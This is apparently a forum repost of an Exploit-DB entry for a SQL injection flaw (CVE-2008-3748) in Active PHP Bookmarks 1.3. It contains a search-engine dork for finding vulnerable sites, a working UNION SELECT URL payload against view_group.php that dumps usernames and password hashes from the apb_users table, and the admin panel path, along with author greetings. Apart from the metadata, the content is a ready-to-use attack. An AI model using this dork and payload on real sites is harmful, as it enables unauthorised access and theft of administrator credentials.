Exploit Active PHP BookMarks 1.3 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10597
Проверка EDB
  1. Пройдено
Автор
MR.ELGAARH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-3748
Дата публикации
2009-12-22
Код:
# Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-21
=============================================================
~ Author : Mr.Elgaarh
~ Email : [email protected]
~ Home : http://securityreason.com/
=============================================================

Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=

./Exploit:

first search for the admin username :
ex : http://server/path/view_group.php?id=-4

ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--

admin panel path : http://server/path/cookie_auth.php?action=cookie_login

---------------------------------------------------------------------------------------------------------------------------
Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security  - AG-Spider - ISlamic Defenders Crew - <http://www.offensive-security.com>
 
Источник
www.exploit-db.com

Похожие темы